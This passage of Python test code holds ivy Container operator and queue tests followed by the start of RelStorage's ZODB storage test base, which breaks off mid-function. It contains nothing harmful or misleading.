container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a < container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
# def test_container_scalar_less_than_or_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = container <= 2
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_less_than_or_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 <= container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_less_than_or_equal_to(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container = container_a <= container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container == 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 == container
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_equal_to(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a == container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_scalar_not_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = container != 2
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_reverse_scalar_not_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = 2 != container
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_not_equal_to(dev, call):
# container_a = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container_b = Container({'a': ivy.array([2], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
# container = container_a != container_b
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container > 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_greater_than(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = 2 > container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a > container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_greater_than_or_equal_to(dev, call):
container = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container = container >= 2
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
# def test_container_reverse_scalar_greater_than_or_equal_to(dev, call):
# container = Container({'a': ivy.array([1], dev=dev),
# 'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
# container = 2 >= container
# assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
# assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
# assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
# assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_greater_than_or_equal_to(dev, call):
container_a = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([5], dev=dev)}})
container_b = Container({'a': ivy.array([2], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([5], dev=dev)}})
container = container_a >= container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_and(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container & True
# Note: "container and True" cannot work: the `and` keyword is not overloadable; Python truth-tests the left operand via bool() and returns one of the operands unchanged, hence the & operator above.
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_and(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = True and container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_and(dev, call):
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a and container_b
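# Note: `and` cannot be overloaded, so this expression truth-tests container_a and simply returns
# container_b; the assertions below therefore match container_b's values rather than an element-wise
# logical-and (which would need an explicit function, e.g. something like ivy.logical_and, if available).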
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_scalar_or(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container or False
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_reverse_scalar_or(dev, call):
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = False or container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_or(dev, call):
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a or container_b
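# Note: as with `and` above, `or` returns the first truthy operand, so this is container_a unchanged
# rather than an element-wise logical-or; the assertions below match container_a's values.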
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_not(dev, call):
container = ~Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_scalar_xor(dev, call):
if call is helpers.mx_call:
# MXNet arrays do not overload the ^ operator; support can be added if an explicit ivy.logical_xor is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container != True
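# Note: for boolean arrays, element-wise != is equivalent to logical xor, so this exercises the same
# behaviour without relying on the ^ operator.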
assert np.allclose(ivy.to_numpy(container['a']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.a), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([True]))
def test_container_reverse_scalar_xor(dev, call):
if call is helpers.mx_call:
# MXNet arrays do not overload the ^ operator; support can be added if an explicit ivy.logical_xor is implemented at some point
pytest.skip()
container = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = False != container
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_xor(dev, call):
if call is helpers.mx_call:
# MXNet arrays do not overload the ^ operator; support can be added if an explicit ivy.logical_xor is implemented at some point
pytest.skip()
container_a = Container({'a': ivy.array([True], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container_b = Container({'a': ivy.array([False], dev=dev),
'b': {'c': ivy.array([True], dev=dev), 'd': ivy.array([False], dev=dev)}})
container = container_a != container_b
assert np.allclose(ivy.to_numpy(container['a']), np.array([True]))
assert np.allclose(ivy.to_numpy(container.a), np.array([True]))
assert np.allclose(ivy.to_numpy(container['b']['c']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.c), np.array([False]))
assert np.allclose(ivy.to_numpy(container['b']['d']), np.array([False]))
assert np.allclose(ivy.to_numpy(container.b.d), np.array([False]))
def test_container_shape(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, 1]
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2., 3.], [4., 5.], [6., 7.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, None]
dict_in = {'a': ivy.array([[[1., 2.], [2., 3.], [3., 4.]]], dev=dev),
'b': {'c': ivy.array([[[2., 3.], [4., 5.], [6., 7.]]], dev=dev),
'd': ivy.array([[[3., 4.], [6., 7.], [9., 10.]]], dev=dev)}}
container = Container(dict_in)
assert container.shape == [1, 3, 2]
def test_container_shapes(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.]]], dev=dev), 'd': ivy.array([[9.]], dev=dev)}}
container_shapes = Container(dict_in).shapes
assert list(container_shapes['a']) == [1, 3, 1]
assert list(container_shapes.a) == [1, 3, 1]
assert list(container_shapes['b']['c']) == [1, 2, 1]
assert list(container_shapes.b.c) == [1, 2, 1]
assert list(container_shapes['b']['d']) == [1, 1]
assert list(container_shapes.b.d) == [1, 1]
# def test_container_dev_str(dev, call):
# dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
# 'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
# 'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
# container = Container(dict_in)
# assert container.dev_str == dev
def test_container_create_if_absent(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
# depth 1
container = Container(dict_in)
container.create_if_absent('a', None, True)
assert np.allclose(ivy.to_numpy(container.a), np.array([[[1.], [2.], [3.]]]))
container.create_if_absent('e', ivy.array([[[4.], [8.], [12.]]]), True)
assert np.allclose(ivy.to_numpy(container.e), np.array([[[4.], [8.], [12.]]]))
# depth 2
container.create_if_absent('f/g', np.array([[[5.], [10.], [15.]]]), True)
assert np.allclose(ivy.to_numpy(container.f.g), np.array([[[5.], [10.], [15.]]]))
def test_container_if_exists(dev, call):
dict_in = {'a': ivy.array([[[1.], [2.], [3.]]], dev=dev),
'b': {'c': ivy.array([[[2.], [4.], [6.]]], dev=dev),
'd': ivy.array([[[3.], [6.], [9.]]], dev=dev)}}
container = Container(dict_in)
assert np.allclose(ivy.to_numpy(container.if_exists('a')), np.array([[[1.], [2.], [3.]]]))
assert 'c' not in container
assert container.if_exists('c') is None
container['c'] = ivy.array([[[1.], [2.], [3.]]], dev=dev)
assert np.allclose(ivy.to_numpy(container.if_exists('c')), np.array([[[1.], [2.], [3.]]]))
assert container.if_exists('d') is None
container.d = ivy.array([[[1.], [2.], [3.]]], dev=dev)
assert np.allclose(ivy.to_numpy(container.if_exists('d')), np.array([[[1.], [2.], [3.]]]))
def test_jax_pytree_compatibility(dev, call):
if call is not helpers.jnp_call:
pytest.skip()
# import
from jax.tree_util import tree_flatten
# dict in
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
# container
container = Container(dict_in)
# container flattened
cont_values = tree_flatten(container)[0]
# dict flattened
true_values = tree_flatten(dict_in)[0]
# assertion
for i, true_val in enumerate(true_values):
assert np.array_equal(ivy.to_numpy(cont_values[i]), ivy.to_numpy(true_val))
def test_container_from_queues(dev, call):
if 'gpu' in dev:
# Cannot re-initialize CUDA in forked subprocess. 'spawn' start method must be used.
pytest.skip()
if ivy.gpu_is_available() and call is helpers.jnp_call:
# We have not found a way to set the default device for JAX, and this causes issues with
# multiprocessing and CUDA, even when dev=cpu
# ToDo: find a fix for this problem ^^
pytest.skip()
def worker_fn(in_queue, out_queue, load_size, worker_id):
keep_going = True
while keep_going:
try:
keep_going = in_queue.get(timeout=0.1)
except queue.Empty:
continue
out_queue.put({'a': [ivy.to_native(ivy.array([1., 2., 3.], dev=dev)) * worker_id] * load_size})
workers = list()
in_queues = list()
out_queues = list()
queue_load_sizes = [1, 2, 1]
for i, queue_load_size in enumerate(queue_load_sizes):
input_queue = multiprocessing.Queue()
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(input_queue, output_queue, queue_load_size, i + 1))
worker.start()
in_queues.append(input_queue)
out_queues.append(output_queue)
workers.append(worker)
container = Container(queues=out_queues, queue_load_sizes=queue_load_sizes, queue_timeout=0.25)
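# Indexing the container below pulls items lazily from the worker output queues; with
# queue_load_sizes [1, 2, 1], index 0 maps to queue 0, indices 1-2 to queue 1, and index 3 to queue 2.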
# queue 0
queue_was_empty = False
try:
container[0]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[0].put(True)
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container[0].a), np.array([1., 2., 3.]))
# queue 1
queue_was_empty = False
try:
container[1]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
queue_was_empty = False
try:
container[2]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[1].put(True)
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[1].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container[2].a), np.array([2., 4., 6.]))
# queue 2
queue_was_empty = False
try:
container[3]
except queue.Empty:
queue_was_empty = True
assert queue_was_empty
in_queues[2].put(True)
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3., 6., 9.]))
assert np.allclose(ivy.to_numpy(container[3].a), np.array([3., 6., 9.]))
# stop workers
in_queues[0].put(False)
in_queues[1].put(False)
in_queues[2].put(False)
in_queues[0].close()
in_queues[1].close()
in_queues[2].close()
# join workers
for worker in workers:
worker.join()
del container
reltestbase.py
# -*- coding: utf-8; -*-
##############################################################################
#
# Copyright (c) 2008 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""A foundation for RelStorage tests"""
from __future__ import absolute_import
from __future__ import print_function
# pylint:disable=too-many-ancestors,abstract-method,too-many-public-methods,too-many-lines
# pylint:disable=too-many-statements,too-many-locals
import contextlib
import functools
import os
import random
import shutil
import tempfile
import time
import threading
import unittest
from textwrap import dedent
import transaction
from persistent import Persistent
from persistent.mapping import PersistentMapping
from zc.zlibstorage import ZlibStorage
import ZODB.tests.util
from ZODB.Connection import TransactionMetaData
from ZODB.DB import DB
from ZODB.FileStorage import FileStorage
from ZODB.POSException import ReadConflictError
from ZODB.POSException import ReadOnlyError
from ZODB.serialize import referencesf
from ZODB.utils import z64
from ZODB.utils import u64 as bytes8_to_int64
from ZODB.utils import p64 as int64_to_8bytes
from ZODB.tests import BasicStorage
from ZODB.tests import ConflictResolution
from ZODB.tests import MTStorage
from ZODB.tests import PackableStorage
from ZODB.tests import PersistentStorage
from ZODB.tests import ReadOnlyStorage
from ZODB.tests import StorageTestBase
from ZODB.tests import Synchronization
from ZODB.tests.StorageTestBase import zodb_pickle
from ZODB.tests.StorageTestBase import zodb_unpickle
from ZODB.tests.MinPO import MinPO
from . import fakecache
from . import util
from . import mock
from . import TestCase
from . import StorageCreatingMixin
from . import skipIfNoConcurrentWriters
from .persistentcache import PersistentCacheStorageTests
from .locking import TestLocking
from .test_zodbconvert import ZlibWrappedFSZODBConvertTests
class RelStorageTestBase(StorageCreatingMixin,
TestCase,
StorageTestBase.StorageTestBase):
base_dbname = None # Override
keep_history = None # Override
_storage_created = None
def _close(self):
# Override from StorageTestBase.
# Try to avoid creating one through our _storage property.
if '_storage' in self.__dict__:
storage = self._storage
else:
storage = self._storage_created
self._storage = None
if storage is not None:
storage.close()
storage.cleanup()
def make_storage_to_cache(self):
return self.make_storage()
def get_storage(self):
# Create a storage with default options
# if it has not been created already.
storage = self._storage_created
if storage is None:
storage = self.make_storage_to_cache()
self._storage_created = storage
return storage
def set_storage(self, storage):
self._storage_created = storage
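# Route the `_storage` attribute expected by the ZODB storage test base classes through the lazy
# getter/setter above, so a default storage is created on first use and can be swapped out by tests.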
_storage = property(
lambda self: self.get_storage(),
lambda self, nv: self.set_storage(nv)
)
def open(self, read_only=False, **kwargs):
# This is used by a few ZODB tests that close and reopen the storage.
storage = self._storage
if storage is not None:
self._storage = None
storage.close()
storage.cleanup()
self._storage = storage = self.make_storage(
read_only=read_only, zap=False, **kwargs)
return storage
class StorageClientThread(MTStorage.StorageClientThread):
# MTStorage assumes that the storage object is thread safe.
# This doesn't make any sense for an MVCC Storage like RelStorage;
# don't try to use a single instance in multiple threads.
#
# This patch makes it respect that.
def __init__(self, storage, *args, **kwargs):
storage = storage.new_instance()
super(StorageClientThread, self).__init__(storage, *args, **kwargs)
def runtest(self):
try:
super(StorageClientThread, self).runtest()
finally:
self.storage.release()
self.storage = None
class ExtStorageClientThread(StorageClientThread, MTStorage.ExtStorageClientThread):
"Same as above."
class ThreadWrapper(object):
def __init__(self, storage):
self.__storage = storage
# We can't use an RLock, which verifies that the thread that
# acquired it is the one that releases it, because check_tid_ordering_w_commit
# deliberately spreads these actions across threads.
self.__commit_lock = threading.Lock()
rl = self.__read_lock = threading.Lock()
self.__txn = None
def make_locked(name):
meth = getattr(storage, name)
@functools.wraps(meth)
def func(*args, **kwargs):
with rl:
return meth(*args, **kwargs)
return func
for name in (
'loadBefore',
'load',
'store',
'getTid',
'lastTransaction',
):
setattr(self, name, make_locked(name))
def __getattr__(self, name):
return getattr(self.__storage, name)
def tpc_begin(self, txn):
self.__commit_lock.acquire()
self.__read_lock.acquire()
assert not self.__txn
self.__txn = txn
self.__read_lock.release()
return self.__storage.tpc_begin(txn)
def tpc_finish(self, txn, callback=None):
self.__read_lock.acquire()
assert txn is self.__txn
try:
return self.__storage.tpc_finish(txn, callback)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
def tpc_abort(self, txn):
self.__read_lock.acquire()
assert txn is self.__txn, (txn, self.__txn)
try:
return self.__storage.tpc_abort(txn)
finally:
self.__txn = None
self.__commit_lock.release()
self.__read_lock.release()
class UsesThreadsOnASingleStorageMixin(object):
# These tests attempt to use threads on a single storage object.
# That doesn't make sense with MVCC, where every instance is its
# own connection and doesn't need to do any locking. This mixin makes
# those tests use a special storage that locks.
@contextlib.contextmanager
def __thread_safe_wrapper(self):
orig_storage = self._storage
wrapped = self._storage = ThreadWrapper(orig_storage)
try:
yield
finally:
if self._storage is wrapped:
self._storage = orig_storage
def __generic_wrapped_test(self, meth_name):
meth = getattr(
super(UsesThreadsOnASingleStorageMixin, self),
meth_name)
try:
with self.__thread_safe_wrapper():
meth()
finally:
self._storage.zap_all(slow=True)
def make_func(name): # pylint:disable=no-self-argument
return lambda self: self.__generic_wrapped_test(name)
for bad_test in (
'check_checkCurrentSerialInTransaction',
# This one stores a b'y' (invalid pickle) into the
# database as the root object, so if we don't get zapped
# afterwards, we can't open the database.
'check_tid_ordering_w_commit',
):
locals()[bad_test] = make_func(bad_test)
del make_func
del bad_test
class GenericRelStorageTests(
UsesThreadsOnASingleStorageMixin,
RelStorageTestBase,
PersistentCacheStorageTests,
TestLocking,
BasicStorage.BasicStorage,
PackableStorage.PackableStorage,
Synchronization.SynchronizedStorage,
ConflictResolution.ConflictResolvingStorage,
PersistentStorage.PersistentStorage,
MTStorage.MTStorage,
ReadOnlyStorage.ReadOnlyStorage,
):
def setUp(self):
# ZODB.tests.util.TestCase likes to change directories
# It tries to change back in tearDown(), but if there's an error,
# we may not get to tearDown. addCleanup() always runs, though.
# Do that as the very last thing that happens (except for subclasses, which
# could add things first).
self.addCleanup(os.chdir, os.getcwd())
super(GenericRelStorageTests, self).setUp()
# PackableStorage is particularly bad about leaving things
# dangling. For example, if the ClientThread runs into
# problems, it doesn't close its connection, which can leave
# locks dangling until GC happens and break other threads and even
# other tests.
#
# Patch around that. Be sure to only close a given connection once,
# though.
_closing = self._closing
def db_factory(storage, *args, **kwargs):
